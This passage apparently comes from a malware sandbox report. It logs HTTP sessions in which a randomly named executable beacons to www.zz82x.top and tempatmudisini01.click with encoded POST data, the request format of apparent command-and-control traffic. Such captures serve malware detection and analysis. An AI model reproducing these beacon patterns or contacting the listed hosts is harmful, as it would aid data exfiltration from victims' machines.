                                Data Ascii: i(#;Az$4k[OP<|T^Rts7 K},NU}<7q16"jcatHVKpwu',pk)MY&|l4"*nEU+E/wQ4[~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/gVi0BW
                                Sep 23, 2024 14:37:19.356076002 CEST1236INData Raw: 0d 24 52 8b 33 49 30 99 64 36 0e 4c 0e a2 e0 22 01 25 93 0d 03 e3 fe 79 ec ca c5 f1 61 75 88 ba 67 b9 a6 cc 4c 96 83 f3 83 cd c2 bc f8 b0 f9 b5 9b e2 6a 73 e8 f6 0b ae 27 fd bb 82 5c 7d 4a 8e 13 97 2d ec 17 cd 7f 44 d6 5c 6e c1 f5 34 4d 6f 8d e1
                                Data Ascii: $R3I0d6L"%yaugLjs'\}J-D\n4Moz^Dm]jaG!c,F!4y;&<+D\@[0W0*-Kdo\O@5xN=0E!Ws;LpD}M]hP2{=$O\]!
                                Sep 23, 2024 14:37:19.356168985 CEST1120INData Raw: bc ac 4c 45 28 60 59 eb 1c 66 7a 63 cf 18 20 90 0a 6d 7e 79 00 61 c9 6b 49 28 88 f2 8d 9b 30 90 0c 6c 83 ff 2c b1 5e b2 14 d5 3b ba da 3e 3c c6 da e4 ef 16 be f9 dd b2 87 fc 0d 85 0d 66 5a 07 14 ab b9 ed 6e 0b 9f 5d f6 09 5a 1d 08 6f 84 a1 9e cf
                                Data Ascii: LE(`Yfzc m~yakI(0l,^;><fZn]Zos:Q4O{wNN%fX2R0]3+_;"wuOue7S'4suviR~2/9E!"KuKz+5'Q
                                Sep 23, 2024 14:37:19.356184006 CEST1236INData Raw: a2 b1 b9 b8 3e 47 74 1b b5 42 ce 98 d4 62 09 aa bd 08 f5 f5 39 8a 77 39 ad 9c e7 28 09 50 c1 3e 4b a1 6d ef 1c 2c 11 ff 6d 9e 88 55 12 ed 86 2b e7 39 ea e8 65 d9 5b 39 cf d1 84 03 3b 6c 2c d1 97 78 d9 89 d2 15 7a 51 7c f7 b6 ff fe 77 8a cb 1b a9
                                Data Ascii: >GtBb9w9(P>Km,mU+9e[9;l,xzQ|wH6\=vHuWJ4eF>!-)ji:,6Sd5Z6%S*ZYQv-ek7oIlA$pr@u{|Brf:=->&s:9bj
                                Sep 23, 2024 14:37:19.356197119 CEST1236INData Raw: 62 b0 34 8b ca b0 36 00 f9 56 3d 19 61 b4 d7 6e 8b 10 d8 47 a1 6f f7 c8 e8 b2 39 f6 39 d2 db dd 9c e3 b8 13 a5 ee 74 11 1b 28 42 f7 7c 94 3d 0c 29 c7 b0 91 87 45 10 d8 51 09 4c 49 b1 11 bc 67 1d 2f 15 a6 a8 5a 27 03 bc bb 87 5d 1a 97 59 93 d4 1d
                                Data Ascii: b46V=anGo99t(B|=)EQLIg/Z']YX{8wv7mjy4%{?N1U2LI]s)sm4#.#=UIaP\[X=AbN'i&]D(A~fQx!CP}dBA{:
                                Sep 23, 2024 14:37:19.356291056 CEST1236INData Raw: be aa 67 14 59 b7 db 1d 9d 33 6e c1 17 a0 4a bd 63 8f 0d 3d 97 be ad c8 13 92 9d 05 be cc b1 a6 06 b2 bb 22 1a 95 e8 36 89 d9 97 58 47 68 85 0b 64 07 07 37 84 8a 4b 03 88 f6 b3 7e c1 b1 23 a3 b8 57 0a b2 c0 2a 66 44 df 08 d4 43 b4 31 12 19 ef 0a
                                Data Ascii: gY3nJc="6XGhd7K~#W*fDC1$"-`l9\)<ndMI|Zh"e[X.$Ef<P38"sHvvEUZR!r,+DC(9(53likXr6`
                                Sep 23, 2024 14:37:19.356303930 CEST1020INData Raw: cf 82 a0 c5 13 38 45 80 65 42 b6 cb 6c 93 ef 6f 56 b8 8a 5f 63 bf 97 78 90 0e 57 88 6c de ef 3b 19 b8 28 f2 1b 4c 4d d4 25 cc ea 1e 45 d1 5d d6 09 a9 63 b8 ba ee 39 3c cb d8 f6 18 eb 65 1c b5 ae c8 e4 41 fb 74 b9 c9 cd 3d dd 2c 72 5e 71 c0 97 69
                                Data Ascii: 8EeBloV_cxWl;(LM%E]c9<eAt=,r^qiUFSq,d+-L=4,c&m`96ynZ2\Z\,f49is$6q&9i_y/bgi]h/8G''qPjO@88'Q1


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.749708103.21.221.4803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:20.576164007 CEST487OUTGET /phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.tempatmudisini01.click
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:37:21.769678116 CEST543INHTTP/1.1 301 Moved Permanently
                                Connection: close
                                x-powered-by: PHP/7.4.33
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                cache-control: no-cache, must-revalidate, max-age=0
                                content-type: text/html; charset=UTF-8
                                x-redirect-by: WordPress
                                location: http://tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2L
                                x-litespeed-cache: miss
                                content-length: 0
                                date: Mon, 23 Sep 2024 12:37:21 GMT
                                server: LiteSpeed


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.74970938.47.232.196803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:27.333808899 CEST731OUTPOST /2lu6/ HTTP/1.1
                                Host: www.zz82x.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.zz82x.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.zz82x.top/2lu6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 43 5a 6f 54 33 79 54 54 4e 6f 42 49 68 78 34 71 37 4b 31 69 5a 4e 79 73 6d 7a 58 66 42 6a 48 37 35 39 74 47 73 75 32 47 5a 50 46 7a 33 5a 77 42 61 71 33 2f 31 6a 72 42 54 77 61 68 58 70 35 4e 37 61 76 43 56 6b 63 50 33 4e 72 64 74 6d 35 65 4f 70 33 41 6b 2f 65 45 68 5a 55 70 57 51 69 44 61 4c 76 41 7a 70 32 4c 6d 6c 2b 70 33 32 49 6d 2f 30 76 4d 39 30 30 30 52 6c 38 2f 6d 56 4d 74 6e 75 33 50 62 59 4d 43 50 48 53 37 79 78 70 45 45 57 34 66 38 58 4a 65 30 76 78 4f 66 79 6d 75 49 72 59 78 2b 6d 43 58 73 4d 4f 57 4b 32 6a 38 6a 78 69 54 6d 75 34 76 67 77 4a 6f 49 46 78 52 45 67 2f 54 4f 43 68 49 4a 36 48 5a 79 4b 39 51 6d 41 3d 3d
                                Data Ascii: 76=CZoT3yTTNoBIhx4q7K1iZNysmzXfBjH759tGsu2GZPFz3ZwBaq3/1jrBTwahXp5N7avCVkcP3Nrdtm5eOp3Ak/eEhZUpWQiDaLvAzp2Lml+p32Im/0vM9000Rl8/mVMtnu3PbYMCPHS7yxpEEW4f8XJe0vxOfymuIrYx+mCXsMOWK2j8jxiTmu4vgwJoIFxREg/TOChIJ6HZyK9QmA==
                                Sep 23, 2024 14:37:28.123538017 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:27 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.74971038.47.232.196803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:29.880053043 CEST751OUTPOST /2lu6/ HTTP/1.1
                                Host: www.zz82x.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.zz82x.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.zz82x.top/2lu6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 43 5a 6f 54 33 79 54 54 4e 6f 42 49 67 52 6f 71 35 72 31 69 66 74 79 76 6a 7a 58 66 50 44 48 2f 35 39 70 47 73 72 58 64 59 39 68 7a 33 37 6f 42 49 59 66 2f 34 44 72 42 5a 51 61 67 54 70 35 45 37 61 6a 67 56 6d 34 50 33 4e 2f 64 74 69 78 65 50 65 62 48 69 2f 65 47 30 4a 56 76 53 51 69 44 61 4c 76 41 7a 74 66 6b 6d 6c 32 70 30 47 34 6d 2b 51 62 44 31 55 30 33 55 6c 38 2f 73 31 4e 6d 6e 75 33 78 62 5a 52 4b 50 45 71 37 79 31 6c 45 45 6e 34 63 32 58 49 58 70 66 78 59 55 67 75 67 47 4a 77 66 36 58 47 44 70 4f 4c 30 47 67 2b 65 35 54 75 2f 34 2f 41 55 6b 79 74 65 66 6a 73 6b 47 68 37 4c 44 67 56 70 57 4e 69 7a 2f 59 63 55 77 2f 66 4a 7a 5a 4c 73 4a 6a 38 43 43 50 4f 7a 51 50 2f 48 6e 72 59 3d
                                Data Ascii: 76=CZoT3yTTNoBIgRoq5r1iftyvjzXfPDH/59pGsrXdY9hz37oBIYf/4DrBZQagTp5E7ajgVm4P3N/dtixePebHi/eG0JVvSQiDaLvAztfkml2p0G4m+QbD1U03Ul8/s1Nmnu3xbZRKPEq7y1lEEn4c2XIXpfxYUgugGJwf6XGDpOL0Gg+e5Tu/4/AUkytefjskGh7LDgVpWNiz/YcUw/fJzZLsJj8CCPOzQP/HnrY=
                                Sep 23, 2024 14:37:30.782752037 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:30 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.74971138.47.232.196803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:32.428009987 CEST1764OUTPOST /2lu6/ HTTP/1.1
                                Host: www.zz82x.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.zz82x.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.zz82x.top/2lu6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 43 5a 6f 54 33 79 54 54 4e 6f 42 49 67 52 6f 71 35 72 31 69 66 74 79 76 6a 7a 58 66 50 44 48 2f 35 39 70 47 73 72 58 64 59 39 70 7a 33 49 67 42 5a 4f 58 2f 35 44 72 42 43 51 61 6c 54 70 34 57 37 5a 54 6b 56 6d 45 66 33 50 48 64 74 46 78 65 49 72 76 48 33 50 65 47 72 35 55 6f 57 51 69 53 61 4c 2f 45 7a 70 37 6b 6d 6c 32 70 30 45 77 6d 33 6b 76 44 33 55 30 30 52 6c 38 6a 6d 56 4d 42 6e 71 53 4b 62 5a 56 61 50 56 4b 37 79 56 31 45 58 31 41 63 36 58 49 56 71 66 77 62 55 67 7a 69 47 4a 73 54 36 58 69 70 70 4f 7a 30 45 57 44 6c 76 58 75 43 6b 2b 6b 4e 6e 41 31 46 56 6c 39 54 50 6a 44 70 4d 67 35 38 61 73 36 51 36 62 6f 44 6b 50 50 46 72 49 76 46 52 68 45 47 47 37 37 46 46 2f 44 68 6c 50 6e 62 68 7a 4c 75 4b 7a 75 45 33 50 2b 71 73 66 7a 6c 78 30 75 4d 77 55 46 67 5a 45 61 5a 43 53 43 48 4b 50 72 44 41 51 66 57 44 4f 4c 4b 34 6c 66 78 38 4c 67 72 52 53 4b 48 2f 6f 38 4b 6d 68 30 6a 6d 74 34 4d 36 74 2b 34 57 54 73 72 6e 55 31 2b 4c 39 57 62 6f 31 72 4b 6e 57 34 6d 67 34 5a 36 6c 46 51 70 71 75 66 [TRUNCATED]
                                Data Ascii: 76=CZoT3yTTNoBIgRoq5r1iftyvjzXfPDH/59pGsrXdY9pz3IgBZOX/5DrBCQalTp4W7ZTkVmEf3PHdtFxeIrvH3PeGr5UoWQiSaL/Ezp7kml2p0Ewm3kvD3U00Rl8jmVMBnqSKbZVaPVK7yV1EX1Ac6XIVqfwbUgziGJsT6XippOz0EWDlvXuCk+kNnA1FVl9TPjDpMg58as6Q6boDkPPFrIvFRhEGG77FF/DhlPnbhzLuKzuE3P+qsfzlx0uMwUFgZEaZCSCHKPrDAQfWDOLK4lfx8LgrRSKH/o8Kmh0jmt4M6t+4WTsrnU1+L9Wbo1rKnW4mg4Z6lFQpqufjhENPBmXn9i2U9tUwxhGyzbTzLns435al8Aa69yQWq/G9stT/kNIcBlu6kBAdXd+FnVyhPfeO6HFb2pU8dRK/s5sD5lUcyNhCh/gfCipKv5K1Luqw1hpC79OFFqlkO/iHMevbzul1u6msm40OpjY5+hzE4Cm/RZdG2gW2we7oIIHtgUMSH0P7O0PapB231paE6x+icQVn0CS7bJeYOi2XuTeGzsEOBQLtthNa5ASr1ZsKkya9SLKKo9MPSihcEKqc42W+lMauxiJF1scPsETXbGUP7S7N+4npXsr7qVrq28QQ+OKNpTNsG4LaNKQzFF5J5Qfu0Y9vKvNk4wWDflg/TJYSNOwaiu6arLzKEwFMdmOag4uUpP1ELsMEAsOt8fbRtSqZso+oid9BZKQUlndaOsiybcOCAHmXfo/aS/9KP71b3asL7H821bRsigwciA/2tYSOicWMU3NjLy9tcUO8KxRf8VO9sH//4QhayZpWd4+6Nf64idgP/lRclwiYVX7hDi6aeFQtSkcAKeDu8cWuYDC8/iNw3v9WVIyp6k7CmpRFEGy7gkf/3epAJd5HoYvX0yOhb4z+Q7PDtXrJwEYqKv4XLIy4nWhmOXnC1vrjHOG2RwwGjR2n5cIB3uxRbH+rMDLaK50UNvqlNBHhTKQ91TgfmcenITKTc [TRUNCATED]
                                Sep 23, 2024 14:37:33.546189070 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:33 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.74971238.47.232.196803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:34.967307091 CEST474OUTGET /2lu6/?76=PbAz0EfTKowYn11d9L8KeIyoxyngBHbvlbcT88jVQuwl479Ud/v94CC+Ex+uZY8Wq5vHWUIm1erRj2VcHYbUz5WJs9RaUjKCQ9bJpumP+lrR5hAi4gPt8UgQTkM/uAhjmqXAbZ9LXA/l&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.zz82x.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:37:36.663703918 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:35 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                Sep 23, 2024 14:37:36.663927078 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:35 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                Sep 23, 2024 14:37:36.664376020 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:35 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
